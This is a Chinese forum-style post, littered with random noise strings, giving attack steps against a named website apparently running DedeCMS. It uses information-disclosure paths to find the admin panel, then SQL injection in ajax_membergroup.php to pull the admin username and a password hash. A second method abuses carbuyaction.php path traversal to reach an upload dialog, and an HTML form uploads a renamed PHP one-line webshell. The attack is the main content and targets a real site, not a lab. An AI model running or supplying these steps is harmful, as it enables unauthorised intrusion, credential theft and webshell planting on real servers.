①注入漏洞。/ z( Y( [. M9 @( e* B
这站 http://www.political-security.com/
- L, Q2 c+ J& c8 h首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
6 B( F1 d- ]7 g/ ]) c; owww.political-security.com/data/mysql_error_trace.inc 爆后台! B: \7 I+ d% A; d
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。! J& k- x: ~# y9 Z4 m% g
然后写上语句 : N2 e5 n: d0 t" D5 G3 w
查看管理员帐号2 V4 @$ j, `% p
http://www.political-security.co ... &membergroup=@`
) e6 ~# c8 ~- X0 {' [
* {! k0 |2 {6 c5 Gadmin
8 C8 U, m. ~, \0 v6 j: R A6 R
* T; Q# i1 i5 Y9 T. e- C查看管理员密码
" }0 N N6 K" \5 K. C# c7 W' ` http://www.political-security.co ... &membergroup=@`% i D2 T/ s8 |! A7 h9 V6 j; x9 U* {
$ z0 {; d" M& |# V1 N: h6 \8d29b1ef9f8c5a5af429# v: k* A( Z' Z9 Z$ ^
' I8 G8 I' ^" S+ j( N查看管理员密码" f8 J8 M( Z& Y/ [0 a
% M6 i$ T/ k* L得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5, e& X/ d# j' I0 \6 n
% o5 W/ n6 E2 N# O* ~
8d2
! a9 ]1 T! j0 L4 z9b1ef9f8c5a5af42
, M2 ]0 n0 r4 z" L) X90 E' f8 Q& O; S# t" g2 R
- k; U$ W. f# |cmd5没解出来 只好测试第二个方法0 i! ?6 y" C1 B: ?) @* ^2 w6 V1 A4 L
+ o2 L: u* G I8 u) l
8 x+ z3 s) T: |1 j②上传漏洞: T5 ?0 K) |" l k1 b
( _6 h i& _% ~3 k- F( ~" K
只要登陆会员中心,然后访问页面链接/ {. s3 k4 V3 _) m5 U
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
3 Q- c8 f$ R5 T
9 A+ w- e0 U: q如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”4 t* a* E+ k3 I+ w/ K6 }+ K
5 B: r! {! K1 G% [6 L
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
# F' H* j$ `: K. o9 z6 {! V+ w+ e5 O; E0 U: N- h( B+ E) c
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>" o, l$ {3 O; X! R
或者
3 E3 F9 _; H( d* f' s即可上传成功 |